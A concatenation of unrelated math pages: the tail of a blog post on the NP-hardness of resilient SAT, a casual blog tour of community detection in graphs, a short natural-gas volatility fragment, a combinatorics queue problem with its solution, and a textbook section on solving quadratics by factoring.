Now the choice of a new set of variables allows us to give some resilient. If you fix one variable to the value of your choice, I can always just work with the other set of variables. Your manipulation doesn’t change the satisfiability of the ORed formula, because I’ve added all of this redundancy. So we took a 3-SAT formula and turned it into a 1-resilient 6-SAT formula.
The idea generalizes to the blowing up lemma, which says that you can measure the effects of a blowup no matter what you start with. More formally, if $s$ is the number of copies of variables you make, $k$ is the clause size of the starting formula $\varphi$, and $r$ is the resilience of $\varphi$, then blowing up gives you an $[(r+1)s - 1]$-resilient $(sk)$-SAT formula. The argument is almost identical to the example above the resilience is more general. Specifically, if you fix fewer than $(r+1)s$ variables, then the pigeonhole principle guarantees that one of the $s$ copies of variables has at most $r$ fixed values, and we can just work with that set of variables (i.e., this small part of the big ORed formula is satisfiable if $\varphi$ was $r$-resilient).
The shrinking down lemma is another trick that is similar to the reduction from $k$-SAT to 3-SAT. There you take a clause like $v \vee w \vee x \vee y \vee z$ and add new variables $z_i$ to break up the clause in to clauses of size 3 as follows:
$\displaystyle (v \vee w \vee z_1) \wedge (\neg z_1 \vee x \vee z_2) \wedge (\neg z_2 \vee y \vee z)$
These are equivalent because your choice of truth values for the $z_i$ tell me which of these sub-clauses to look for a true literal of the old variables. I.e. if you choose $z_1 = T, z_2 = F$ then you have to pick either $y$ or $z$ to be true. And it’s clear that if you’re willing to double the number of variables (a linear blowup) you can always get a $k$-clause down to an AND of 3-clauses.
So the shrinking down reduction does the same thing, except we only split clauses in half. For a clause $C$, call $C[:k/2]$ the first half of a clause and $C[k/2:]$ the second half (you can see how my Python training corrupts my notation preference). Then to shrink a clause $C_i$ down from size $k$ to size $\lceil k/2 \rceil + 1$ (1 for the new variable), add a variable $z_i$ and break $C_i$ into
$\displaystyle (C_i[:k/2] \vee z_i) \wedge (\neg z_i \vee C[k/2:])$
and just AND these together for all clauses. Call the original formula $\varphi$ and the transformed one $\psi$. The formulas are logically equivalent for the same reason that the $k$-to-3-SAT reduction works, and it’s already in the right CNF form. So resilience is all we have to measure. The claim is that the resilience is $q = \min(r, \lfloor k/2 \rfloor)$, where $r$ is the resilience of $\varphi$.
The reason for this is that if all the fixed variables are old variables (not $z_i$), then nothing changes and the resilience of the original $\phi$ keeps us safe. And each $z_i$ we fix has no effect except to force us to satisfy a variable in one of the two halves. So there is this implication that if you fix a $z_i$ you have to also fix a regular variable. Because we can’t guarantee anything if we fix more than $r$ regular variables, we’d have to stop before fixing $r$ of the $z_i$. And because these new clauses have size $k/2 + 1$, we can’t do this more than $k/2$ times or else we risk ruining an entire clause. So this give the definition of $q$. So this proves the shrinking down lemma.
## Resilient SAT is always hard
The blowing up and shrinking down lemmas can be used to show that $r$-resilient $k$-SAT is NP-hard for all $r < k$. What we do is reduce from 3-SAT to an $r$-resilient $k$-SAT instance in such a way that the 3-SAT formula is satisfiable if and only if the transformed formula is resiliently satisfiable.
What makes these two lemmas work together is that shrinking down shrinks the clause size just barely less than the resilience, and blowing up increases resilience just barely more than it increases clause size. So we can combine these together to climb from 3-SAT up to some high resilience and satisfiability, and then iteratively shrink down until we hit our target.
One might worry that it will take an exponential number of reductions (or a few reductions of exponential size) to get from 3-SAT to the $(r,k)$ of our choice, but we have a construction that does it in at most four steps, with only a linear initial blowup from 3-SAT to $r$-resilient $3(r+1)$-SAT. Then, to deal with the odd ceilings and floors in the shrinking down lemma, you have to find a suitable larger $k$ to reduce to (by padding with useless variables, which cannot make the problem easier). And you choose this $k$ so that you only need at most two applications of shrinking down to get to $(k-1)$-resilient $k$-SAT. Our preprint has the gory details (which has an inelegant part that is not worth writing here), but in the end you show that $(k-1)$-resilient $k$-SAT is hard, and since that’s the maximal amount of resilience before the problem becomes vacuously trivial, all smaller resilience values are also hard.
## So how does this relate to coloring?
I’m happy about this result not just because it answers an open question I’m honestly curious about, but also because it shows that resilient coloring is more interesting. Basically this proves that satisfiability is so hard that no amount of resilience can make it easier in the worst case. But coloring has a gradient of difficulty. Once you get to order $k^2$ resilience for $k$-colorable graphs, the coloring problem can be solved efficiently by a greedy algorithm (and it’s not a vacuously empty class of graphs). Another thing on the side is that we use the hardness of resilient SAT to get the hardness results we have for coloring.
If you really want to stretch the implications, you might argue that this says something like “coloring is somewhat easier than SAT,” because we found a quantifiable axis along which SAT remains difficult while coloring crumbles. The caveat is that fixing colors of vertices is not exactly comparable to fixing values of truth assignments (since we are fixing lots of instances by fixing a variable), but at least it’s something concrete.
Coloring is still mostly open, and recently I’ve been going to talks where people are discussing startlingly similar ideas for things like Hamiltonian cycles. So that makes me happy.
Until next time!
# Community Detection in Graphs — a Casual Tour
Graphs are among the most interesting and useful objects in mathematics. Any situation or idea that can be described by objects with connections is a graph, and one of the most prominent examples of a real-world graph that one can come up with is a social network.
Recall, if you aren’t already familiar with this blog’s gentle introduction to graphs, that a graph $G$ is defined by a set of vertices $V$, and a set of edges $E$, each of which connects two vertices. For this post the edges will be undirected, meaning connections between vertices are symmetric.
One of the most common topics to talk about for graphs is the notion of a community. But what does one actually mean by that word? It’s easy to give an informal definition: a subset of vertices $C$ such that there are many more edges between vertices in $C$ than from vertices in $C$ to vertices in $V - C$ (the complement of $C$). Try to make this notion precise, however, and you open a door to a world of difficult problems and open research questions. Indeed, nobody has yet come to a conclusive and useful definition of what it means to be a community. In this post we’ll see why this is such a hard problem, and we’ll see that it mostly has to do with the word “useful.” In future posts we plan to cover some techniques that have found widespread success in practice, but this post is intended to impress upon the reader how difficult the problem is.
## The simplest idea
The simplest thing to do is to say a community is a subset of vertices which are completely connected to each other. In the technical parlance, a community is a subgraph which forms a clique. Sometimes an $n$-clique is also called a complete graph on $n$ vertices, denoted $K_n$. Here’s an example of a 5-clique in a larger graph:
“Where’s Waldo” for graph theorists: a clique hidden in a larger graph.
Indeed, it seems reasonable that if we can reliably find communities at all, then we should be able to find cliques. But as fate should have it, this problem is known to be computationally intractable. In more detail, the problem of finding the largest clique in a graph is NP-hard. That essentially means we don’t have any better algorithms to find cliques in general graphs than to try all possible subsets of the vertices and check to see which, if any, form cliques. In fact it’s much worse, this problem is known to be hard to approximate to any reasonable factor in the worst case (the error of the approximation grows polynomially with the size of the graph!). So we can’t even hope to find a clique half the size of the biggest, or a thousandth the size!
But we have to take these impossibility results with a grain of salt: they only say things about the worst case graphs. And when we’re looking for communities in the real world, the worst case will never show up. Really, it won’t! In these proofs, “worst case” means that they encode some arbitrarily convoluted logic problem into a graph, so that finding the clique means solving the logic problem. To think that someone could engineer their social network to encode difficult logic problems is ridiculous.
So what about an “average case” graph? To formulate this typically means we need to consider graphs randomly drawn from a distribution.
## Random graphs
The simplest kind of “randomized” graph you could have is the following. You fix some set of vertices, and then run an experiment: for each pair of vertices you flip a coin, and if the coin is heads you place an edge and otherwise you don’t. This defines a distribution on graphs called $G(n, 1/2)$, which we can generalize to $G(n, p)$ for a coin with bias $p$. With a slight abuse of notation, we call $G(n, p)$ the Erdős–Rényi random graph (it’s not a graph but a distribution on graphs). We explored this topic form a more mathematical perspective earlier on this blog.
So we can sample from this distribution and ask questions like: what’s the probability of the largest clique being size at least $20$? Indeed, cliques in Erdős–Rényi random graphs are so well understood that we know exactly how they work. For example, if $p=1/2$ then the size of the largest clique is guaranteed (with overwhelming probability as $n$ grows) to have size $k(n)$ or $k(n)+1$, where $k(n)$ is about $2 \log n$. Just as much is known about other values of $p$ as well as other properties of $G(n,p)$, see Wikipedia for a short list.
In other words, if we wanted to find the largest clique in an Erdős–Rényi random graph, we could check all subsets of size roughly $2\log(n)$, which would take about $(n / \log(n))^{\log(n)}$ time. This is pretty terrible, and I’ve never heard of an algorithm that does better (contrary to the original statement in this paragraph that showed I can’t count). In any case, it turns out that the Erdős–Rényi random graph, and using cliques to represent communities, is far from realistic. There are many reasons why this is the case, but here’s one example that fits with the topic at hand. If I thought the world’s social network was distributed according to $G(n, 1/2)$ and communities were cliques, then I would be claiming that the largest community is of size 65 or 66. Estimated world population: 7 billion, $2 \log(7 \cdot 10^9) \sim 65$. Clearly this is ridiculous: there are groups of larger than 66 people that we would want to call “communities,” and there are plenty of communities that don’t form bona-fide cliques.
Another avenue shows that things are still not as easy as they seem in Erdős–Rényi land. This is the so-called planted clique problem. That is, you draw a graph $G$ from $G(n, 1/2)$. You give $G$ to me and I pick a random but secret subset of $r$ vertices and I add enough edges to make those vertices form an $r$-clique. Then I ask you to find the $r$-clique. Clearly it doesn’t make sense when $r < 2 \log (n)$ because you won’t be able to tell it apart from the guaranteed cliques in $G$. But even worse, nobody knows how to find the planted clique when $r$ is even a little bit smaller than $\sqrt{n}$ (like, $r = n^{9/20}$ even). Just to solidify this with some numbers, we don’t know how to reliably find a planted clique of size 60 in a random graph on ten thousand vertices, but we do when the size of the clique goes up to 100. The best algorithms we know rely on some sophisticated tools in spectral graph theory, and their details are beyond the scope of this post.
So Erdős–Rényi graphs seem to have no hope. What’s next? There are a couple of routes we can take from here. We can try to change our random graph model to be more realistic. We can relax our notion of communities from cliques to something else. We can do both, or we can do something completely different.
## Other kinds of random graphs
There is an interesting model of Barabási and Albert, often called the “preferential attachment” model, that has been described as a good model of large, quickly growing networks like the internet. Here’s the idea: you start off with a two-clique $G = K_2$, and at each time step $t$ you add a new vertex $v$ to $G$, and new edges so that the probability that the edge $(v,w)$ is added to $G$ is proportional to the degree of $w$ (as a fraction of the total number of edges in $G$). Here’s an animation of this process:
Image source: Wikipedia
The significance of this random model is that it creates graphs with a small number of hubs, and a large number of low-degree vertices. In other words, the preferential attachment model tends to “make the rich richer.” Another perspective is that the degree distribution of such a graph is guaranteed to fit a so-called power-law distribution. Informally, this means that the overall fraction of small-degree vertices gives a significant contribution to the total number of edges. This is sometimes called a “fat-tailed” distribution. Since power-law distributions are observed in a wide variety of natural settings, some have used this as justification for working in the preferential attachment setting. On the other hand, this model is known to have no significant community structure (by any reasonable definition, certainly not having cliques of nontrivial size), and this has been used as evidence against the model. I am not aware of any work done on planting dense subgraphs in graphs drawn from a preferential attachment model, but I think it’s likely to be trivial and uninteresting. On the other hand, Bubeck et al. have looked at changing the initial graph (the “seed”) from a 2-clique to something else, and seeing how that affects the overall limiting distribution.
Another model that often shows up is a model that allows one to make a random graph starting with any fixed degree distribution, not just a power law. There are a number of models that do this to some fashion, and you’ll hear a lot of hyphenated names thrown around like Chung-Lu and Molloy-Reed and Newman-Strogatz-Watts. The one we’ll describe is quite simple. Say you start with a set of vertices $V$, and a number $d_v$ for each vertex $v$, such that the sum of all the $d_v$ is even. This condition is required because in any graph the sum of the degrees of a vertex is twice the number of edges. Then you imagine each vertex $v$ having $d_v$ “edge-stubs.” The name suggests a picture like the one below:
Each node has a prescribed number of “edge stubs,” which are randomly connected to form a graph.
Now you pick two edge stubs at random and connect them. One usually allows self-loops and multiple edges between vertices, so that it’s okay to pick two edge stubs from the same vertex. You keep doing this until all the edge stubs are accounted for, and this is your random graph. The degrees were fixed at the beginning, so the only randomization is in which vertices are adjacent. The same obvious biases apply, that any given vertex is more likely to be adjacent to high-degree vertices, but now we get to control the biases with much more precision.
The reason such a model is useful is that when you’re working with graphs in the real world, you usually have statistical information available. It’s simple to compute the degree of each vertex, and so you can use this random graph as a sort of “prior” distribution and look for anomalies. In particular, this is precisely how one of the leading measures of community structure works: the measure of modularity. We’ll talk about this in the next section.
## Other kinds of communities
Here’s one easy way to relax our notion of communities. Rather than finding complete subgraphs, we could ask about finding very dense subgraphs (ignoring what happens outside the subgraph). We compute density as the average degree of vertices in the subgraph.
If we impose no bound on the size of the subgraph an algorithm is allowed to output, then there is an efficient algorithm for finding the densest subgraph in a given graph. The general exact solution involves solving a linear programming problem and a little extra work, but luckily there is a greedy algorithm that can get within half of the optimal density. You start with all the vertices $S_n = V$, and remove any vertex of minimal degree to get $S_{n-1}$. Continue until $S_0$, and then compute the density of all the $S_i$. The best one is guaranteed to be at least half of the optimal density. See this paper of Moses Charikar for a more formal analysis.
One problem with this is that the size of the densest subgraph might be too big. Unfortunately, if you fix the size of the dense subgraph you’re looking for (say, you want to find the densest subgraph of size at most $k$ where $k$ is an input), then the problem once again becomes NP-hard and suffers from the same sort of inapproximability theorems as finding the largest clique.
A more important issue with this is that a dense subgraph isn’t necessarily a community. In particular, we want communities to be dense on the inside and sparse on the outside. The densest subgraph analysis, however, might rate the following graph as one big dense subgraph instead of two separately dense communities with some modest (but not too modest) amount of connections between them.
What are the correct communities here?
Indeed, we want a quantifiable a notion of “dense on the inside and sparse on the outside.” One such formalization is called modularity. Modularity works as follows. If you give me some partition of the vertices of $G$ into two sets, modularity measures how well this partition reflects two separate communities. It’s the definition of “community” here that makes it interesting. Rather than ask about densities exactly, you can compare the densities to the expected densities in a given random graph model.
In particular, we can use the fixed-degree distribution model from the last section. If we know the degrees of all the vertices ahead of time, we can compute the probability that we see some number of edges going between the two pieces of the partition relative to what we would see at random. If the difference is large (and largely biased toward fewer edges across the partition and more edges within the two subsets), then we say it has high modularity. This involves a lot of computations — the whole measure can be written as a quadratic form via one big matrix — but the idea is simple enough. We intend to write more about modularity and implement the algorithm on this blog, but the excited reader can see the original paper of M.E.J. Newman.
Now modularity is very popular but it too has shortcomings. First, even though you can compute the modularity of a given partition, there’s still the problem of finding the partition that globally maximizes modularity. Sadly, this is known to be NP-hard. Mover, it’s known to be NP-hard even if you’re just trying to find a partition into two pieces that maximizes modularity, and even still when the graph is regular (every vertex has the same degree).
Still worse, while there are some readily accepted heuristics that often “do well enough” in practice, we don’t even know how to approximate modularity very well. Bhaskar DasGupta has a line of work studying approximations of maximum modularity, and he has proved that for dense graphs you can’t even approximate modularity to within any constant factor. That is, the best you can do is have an approximation that gets worse as the size of the graph grows. It’s similar to the bad news we had for finding the largest clique, but not as bad. For example, when the graph is sparse it’s known that one can approximate modularity to within a $\log(n)$ factor of the optimum, where $n$ is the number of vertices of the graph (for cliques the factor was like $n^c$ for some $c$, and this is drastically worse).
Another empirical issue is that modularity seems to fail to find small communities. That is, if your graph has some large communities and some small communities, strictly maximizing the modularity is not the right thing to do. So we’ve seen that even the leading method in the field has some issues.
## Something completely different
The last method I want to sketch is in the realm of “something completely different.” The notion is that if we’re given a graph, we can run some experiment on the graph, and the results of that experiment can give us insight into where the communities are.
The experiment I’m going to talk about is the random walk. That is, say you have a vertex $v$ in a graph $G$ and you want to find some vertices that are “closest” to $v$. That is, those that are most likely to be in the same community as $v$. What you can do is run a random walk starting at $v$. By a “random walk” I mean you start at $v$, you pick a neighbor at random and move to it, then repeat. You can compute statistics about the vertices you visit in a sample of such walks, and the vertices that you visit most often are those you say are “in the same community as $v$. One important parameter is how long the walk is, but it’s generally believed to be best if you keep it between 3-6 steps.
Of course, this is not a partition of the vertices, so it’s not a community detection algorithm, but you can turn it into one. Run this process for each vertex, and use it to compute a “distance” between all the pairs of vertices. Then you compute a tree of partitions by lumping the closest pairs of vertices into the same community, one at a time, until you’ve got every vertex. At each step of the way, you compute the modularity of the partition, and when you’re done you choose the partition that maximizes modularity. This algorithm as a whole is called the walktrap clustering algorithm, and was introduced by Pons and Latapy in 2005.
This sounds like a really great idea, because it’s intuitive: there’s a relatively high chance that the friends of your friends are also your friends. It’s also really great because there is an easily measurable tradeoff between runtime and quality: you can tune down the length of the random walk, and the number of samples you take for each vertex, to speed up the runtime but lower the quality of your statistical estimates. So if you’re working on huge graphs, you get a lot of control and a clear idea of exactly what’s going on inside the algorithm (something which is not immediately clear in a lot of these papers).
Unfortunately, I’m not aware of any concrete theoretical guarantees for walktrap clustering. The one bit of theoretical justification I’ve read over the last year is that you can relate the expected distances you get to certain spectral properties of the graph that are known to be related to community structure, but the lower bounds on maximizing modularity already suggest (though they do not imply) that walktrap won’t do that well in the worst case.
## So many algorithms, so little time!
I have only brushed the surface of the literature on community detection, and the things I have discussed are heavily biased toward what I’ve read about and used in my own research. There are methods based on information theory, label propagation, and obscure physics processes like “spin glass” (whatever that is, it sounds frustrating).
And we have only been talking about perfect community structure. What if you want to allow people to be in multiple communities, or have communities at varying levels of granularity (e.g. a sports club within a school versus the whole student body of that school)? What if we want to allow people to be “members” of a community at varying degrees of intensity? How do we deal with noisy signals in our graphs? For example, if we get our data from observing people talk, are two people who have heated arguments considered to be in the same community? Since a lot social network data comes from sources like Twitter and Facebook where arguments are rampant, how do we distinguish between useful and useless data? More subtly, how do we determine useful information if a group within the social network are trying to mask their discovery? That is, how do we deal with adversarial noise in a graph?
And all of this is just on static graphs! What about graphs that change over time? You can keep making the problem more and more complicated as it gets more realistic.
With the huge wealth of research that has already been done just on the simplest case, and the difficult problems and known barriers to success even for the simple problems, it seems almost intimidating to even begin to try to answer these questions. But maybe that’s what makes them fascinating, not to mention that governments and big businesses pour many millions of dollars into this kind of research.
In the future of this blog we plan to derive and implement some of the basic methods of community detection. This includes, as a first outline, the modularity measure and the walktrap clustering algorithm. Considering that I’m also going to spend a large part of the summer thinking about these problems (indeed, with some of the leading researchers and upcoming stars under the sponsorship of the American Mathematical Society), it’s unlikely to end there.
Until next time!
|
|
# More on Time-Varying Volatility in NGH4
It looks like incorporating the last 12 months of daily NGH4 prices helps bring the recent volatility into focus. Estimating the Markov regime-switching AR model over the last 12 months (on daily log returns) affords:
$r_{ng,t} = \begin{cases} 0.0006 -0.0429r_{ng,t-1}+ e_{S1,t}, \:\:\:\:\:\:\:\: e_{S1} \sim N(0,0.0122) \\ 0.0040+0.55185r_{ng,t-1}+e_{S2,t}, \:\:\:\:\:\:\: e_{S2} \sim N(0,0.0309) \end{cases}$
with the transition matrix:
$P=\left[ \begin{array} 0.92 \;\;&\;\; 0.50 \\ { } & { } \\ 0.08 \;\;&\;\; 0.50 \end{array}\right]$
This gives annualized volatilities of 19.47% in the low vol state, and 49.08% in the high vol state. Weighting these volatilities by filtered state probability gives:
and NGH4 over the same period is:
|
|
Question
# Let $$n$$ be the number of ways in which $$5$$ boys and $$5$$ girls can stand in a queue in such a way that all the girls stand consecutively in the queue. Let $$m$$ be the number of ways in which $$5$$ boys and $$5$$ girls can stand in a queue in such a way that exactly four girls stand consecutively in the queue. Then the value of $$\dfrac {m}{n}$$, is
Solution
## Let us calculate $$n$$ first. We can consider $$5$$ girls as one set and the $$5$$ boys. We can arrange them in $$6!$$ ways. The girls in the set can be arranged in $$5!$$ ways. Hence, $$n= 5! \times 6!$$Let us calculate $$m$$. Now, let us first place the 4 girls together. We will need to consider different cases. Case 1 : $$4$$ girls at the corner. $$4$$ girls can be selected and permuted in $$^5P_4 = 5 !$$ ways. The $$5^{th}$$ girl can be placed in $$5$$ ways. The boys can be placed in $$5!$$ ways. They can be placed in the left or the right corner. Cases $$= 2 \times 5 \times 5! \times 5 !$$Case 2: The $$4$$ girls are not placed at the corner. The position of the $$4$$ girls together can be selected in $$5$$ ways. The $$4$$ girls can be selected and permuted in $$^5P_4$$ ways. The $$5^{th}$$ girl can be placed in $$4$$ ways. The $$5$$ boys can be placed in $$5!$$ ways. Cases $$= 5\times 5! \times 4 \times 5 !$$Hence, $$m = 30 \times 5 ! \times 5 !$$Hence, $$\dfrac{m}{n} = 5$$Maths
Suggest Corrections
0
Similar questions
View More
People also searched for
View More
|
|
Page 1 / 1
This module is from Elementary Algebra</link>by Denny Burzynski and Wade Ellis, Jr. Methods of solving quadratic equations as well as the logic underlying each method are discussed. Factoring, extraction of roots, completing the square, and the quadratic formula are carefully developed. The zero-factor property of real numbers is reintroduced. The chapter also includes graphs of quadratic equations based on the standard parabola, y = x^2, and applied problems from the areas of manufacturing, population, physics, geometry, mathematics (numbers and volumes), and astronomy, which are solved using the five-step method.Objectives of this module: be able to solve quadratic equations by factoring.
Overview
• Factoring Method
• Solving Mentally After Factoring
Factoring method
To solve quadratic equations by factoring, we must make use of the zero-factor property.
1. Set the equation equal to zero, that is, get all the nonzero terms on one side of the equal sign and 0 on the other.
$a{x}^{2}+bx+c=0$
$\left(\right)\left(\right)=0$
3. By the zero-factor property, at least one of the factors must be zero, so, set each of the factors equal to 0 and solve for the variable.
Sample set a
Solve the following quadratic equations. (We will show the check for problem 1.)
$\begin{array}{lllllllll}{x}^{2}-7x+12\hfill & =\hfill & 0.\hfill & \hfill & \hfill & \hfill & \hfill & \hfill & \begin{array}{l}\text{The\hspace{0.17em}equation\hspace{0.17em}is\hspace{0.17em}already\hspace{0.17em}}\\ \text{set\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}0}\text{.\hspace{0.17em}Factor}\text{.}\end{array}\hfill \\ \left(x-3\right)\left(x-4\right)\hfill & =\hfill & 0\hfill & \hfill & \hfill & \hfill & \hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}0}\text{.}\hfill \\ \hfill x-3& =\hfill & 0\hfill & \hfill & \text{or}\hfill & \hfill & x-4\hfill & =\hfill & 0\hfill \\ \hfill x& =\hfill & 3\hfill & \hfill & \text{or}\hfill & \hfill & \hfill x& =\hfill & 4\hfill \end{array}$
$\begin{array}{llllll}Check:\text{\hspace{0.17em}}\text{If}\text{\hspace{0.17em}}x=3,\text{\hspace{0.17em}}{x}^{2}-7x\hfill & +\hfill & 12\hfill & =\hfill & 0\hfill & \hfill \\ \hfill {3}^{2}-7\text{\hspace{0.17em}}·\text{\hspace{0.17em}}3& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill 9-21& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill & \hfill & 0\hfill & =\hfill & 0\hfill & \text{Yes,\hspace{0.17em}this\hspace{0.17em}is\hspace{0.17em}correct}\text{.}\hfill \end{array}$
$\begin{array}{llllll}Check:\text{\hspace{0.17em}}\text{If}\text{\hspace{0.17em}}x=4,\text{\hspace{0.17em}}{x}^{2}-7x\hfill & +\hfill & 12\hfill & =\hfill & 0\hfill & \hfill \\ \hfill {4}^{2}-7\text{\hspace{0.17em}}·\text{\hspace{0.17em}}4& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill 16-28& +\hfill & 12\hfill & =\hfill & 0\hfill & \text{Is\hspace{0.17em}this\hspace{0.17em}correct?}\hfill \\ \hfill & \hfill & 0\hfill & =\hfill & 0\hfill & \text{Yes,\hspace{0.17em}this\hspace{0.17em}is\hspace{0.17em}correct}\text{.}\hfill \end{array}$
Thus, the solutions to this equation are $x=3,\text{\hspace{0.17em}}4.$
$\begin{array}{lllll}\hfill {x}^{2}& =\hfill & 25.\hfill & \hfill & \text{Set\hspace{0.17em}the\hspace{0.17em}equation\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ \hfill {x}^{2}-25& =\hfill & 0\hfill & \hfill & \text{Factor}\text{.}\hfill \\ \left(x+5\right)\left(x-5\right)\hfill & =\hfill & 0\hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ x+5=0\hfill & \text{or}\hfill & \hfill & x-5=0\hfill & \hfill \\ x=-5\hfill & \text{or}\hfill & \hfill & x=5\hfill & \hfill \end{array}$
Thus, the solutions to this equation are $x=5,-5.$
$\begin{array}{lllll}\hfill {x}^{2}& =\hfill & 2x.\hfill & \hfill & \text{Set\hspace{0.17em}the\hspace{0.17em}equation\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ {x}^{2}-2x\hfill & =\hfill & 0\hfill & \hfill & \text{Factor}\text{.}\hfill \\ x\left(x-2\right)\hfill & \hfill & \hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ x=0\hfill & \text{or}\hfill & \hfill & x-2=0\hfill & \hfill \\ \hfill & \hfill & \hfill & x=2\hfill & \hfill \end{array}$
Thus, the solutions to this equation are $x=0,\text{\hspace{0.17em}}2.$
$\begin{array}{lllll}2{x}^{2}+7x-15\hfill & =\hfill & 0.\hfill & \hfill & \text{Factor}\text{.}\hfill \\ \left(2x-3\right)\left(x+5\right)\hfill & =\hfill & 0\hfill & \hfill & \text{Set\hspace{0.17em}each\hspace{0.17em}factor\hspace{0.17em}equal\hspace{0.17em}to\hspace{0.17em}}0.\hfill \\ 2x-3=0\hfill & \text{or}\hfill & \hfill & x+5=0\hfill & \hfill \\ 2x=3\hfill & \text{or}\hfill & \hfill & x=-5\hfill & \hfill \\ x=\frac{3}{2}\hfill & \hfill & \hfill & \hfill & \hfill \end{array}$
Thus, the solutions to this equation are $x=\frac{3}{2},-5.$
$63{x}^{2}=13x+6$
$\begin{array}{lllll}63{x}^{2}-13x-6\hfill & =\hfill & 0\hfill & \hfill & \hfill \\ \left(9x+2\right)\left(7x-3\right)\hfill & =\hfill & 0\hfill & \hfill & \hfill \\ 9x+2=0\hfill & \hfill & \text{or}\hfill & \hfill & 7x-3=0\hfill \\ 9x=-2\hfill & \hfill & \text{or}\hfill & \hfill & 7x=3\hfill \\ x=\frac{-2}{9}\hfill & \hfill & \text{or}\hfill & \hfill & x=\frac{3}{7}\hfill \end{array}$
Thus, the solutions to this equation are $x=\frac{-2}{9},\frac{3}{7}.$
Practice set a
Solve the following equations, if possible.
$\left(x-7\right)\left(x+4\right)=0$
$x=7,\text{\hspace{0.17em}}-4$
$\left(2x+5\right)\left(5x-7\right)=0$
$x=\frac{-5}{2},\frac{7}{5}$
${x}^{2}+2x-24=0$
$x=4,\text{\hspace{0.17em}}-6$
$6{x}^{2}+13x-5=0$
$x=\frac{1}{3},\frac{-5}{2}$
$5{y}^{2}+2y=3$
$y=\frac{3}{5},-1$
$m\left(2m-11\right)=0$
$m=0,\frac{11}{2}$
$6{p}^{2}=-\left(5p+1\right)$
$p=\frac{-1}{3},\frac{-1}{2}$
${r}^{2}-49=0$
$r=7,-7$
Solving mentally after factoring
Let’s consider problems 4 and 5 of Sample Set A in more detail. Let’s look particularly at the factorizations $\left(2x-3\right)\left(x+5\right)=0$ and $\left(9x+2\right)\left(7x-3\right)=0.$ The next step is to set each factor equal to zero and solve. We can solve mentally if we understand how to solve linear equations: we transpose the constant from the variable term and then divide by the coefficient of the variable.
Sample set b
Solve the following equation mentally.
$\left(2x-3\right)\left(x+5\right)=0$
$\begin{array}{lllll}2x-3\hfill & =\hfill & 0\hfill & \hfill & \text{Mentally\hspace{0.17em}add\hspace{0.17em}3\hspace{0.17em}to\hspace{0.17em}both\hspace{0.17em}sides}\text{.\hspace{0.17em}The\hspace{0.17em}constant\hspace{0.17em}changes\hspace{0.17em}sign}\text{.}\hfill \\ \hfill 2x& =\hfill & 3\hfill & \hfill & \begin{array}{l}\text{Divide\hspace{0.17em}by\hspace{0.17em}2,\hspace{0.17em}the\hspace{0.17em}coefficient\hspace{0.17em}of\hspace{0.17em}}x\text{.\hspace{0.17em}The\hspace{0.17em}2\hspace{0.17em}divides\hspace{0.17em}the\hspace{0.17em}constant\hspace{0.17em}3\hspace{0.17em}into\hspace{0.17em}}\frac{3}{2}\text{.\hspace{0.17em}}\\ \text{The\hspace{0.17em}coefficient\hspace{0.17em}becomes\hspace{0.17em}the\hspace{0.17em}denominator}\text{.}\end{array}\hfill \\ \hfill x& =\hfill & \frac{3}{2}\hfill & \hfill & \hfill \\ \hfill x+5& =\hfill & 0\hfill & \hfill & \text{Mentally\hspace{0.17em}subtract\hspace{0.17em}5\hspace{0.17em}from\hspace{0.17em}both\hspace{0.17em}sides}\text{.\hspace{0.17em}The\hspace{0.17em}constant\hspace{0.17em}changes\hspace{0.17em}sign}\text{.}\hfill \\ \hfill x& =\hfill & -5\hfill & \hfill & \text{Divide\hspace{0.17em}by\hspace{0.17em}the\hspace{0.17em}coefficient\hspace{0.17em}of\hspace{0.17em}\hspace{0.17em}}x\text{,\hspace{0.17em}1}\text{.The\hspace{0.17em}coefficient\hspace{0.17em}becomes\hspace{0.17em}the\hspace{0.17em}denominator}\text{.}\hfill \\ \hfill x=\frac{-5}{1}& =\hfill & -5\hfill & \hfill & \hfill \\ \hfill x& =\hfill & -5\hfill & \hfill & \hfill \end{array}$
Now, we can immediately write the solution to the equation after factoring by looking at each factor, changing the sign of the constant, then dividing by the coefficient.
Practice set b
Solve $\left(9x+2\right)\left(7x-3\right)=0$ using this mental method.
$x=-\frac{2}{9},\frac{3}{7}$
Exercises
For the following problems, solve the equations, if possible.
$\left(x+1\right)\left(x+3\right)=0$
$x=-1,\text{\hspace{0.17em}}\text{\hspace{0.17em}}-3$
$\left(x+4\right)\left(x+9\right)=0$
$\left(x-5\right)\left(x-1\right)=0$
$x=1,\text{\hspace{0.17em}}\text{\hspace{0.17em}}5$
$\left(x-6\right)\left(x-3\right)=0$
$\left(x-4\right)\left(x+2\right)=0$
$x=-2,\text{\hspace{0.17em}}\text{\hspace{0.17em}}4$
$\left(x+6\right)\left(x-1\right)=0$
$\left(2x+1\right)\left(x-7\right)=0$
$x=-\frac{1}{2},\text{\hspace{0.17em}}\text{\hspace{0.17em}}7$
$\left(3x+2\right)\left(x-1\right)=0$
$\left(4x+3\right)\left(3x-2\right)=0$
$x=-\frac{3}{4},\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{2}{3}$
$\left(5x-1\right)\left(4x+7\right)=0$
$\left(6x+5\right)\left(9x-4\right)=0$
$x=-\frac{5}{6},\text{\hspace{0.17em}}\text{\hspace{0.17em}}\frac{4}{9}$
$\left(3a+1\right)\left(3a-1\right)=0$
$x\left(x+4\right)=0$
$x=-4,\text{\hspace{0.17em}}\text{\hspace{0.17em}}0$
$y\left(y-5\right)=0$
$y\left(3y-4\right)=0$
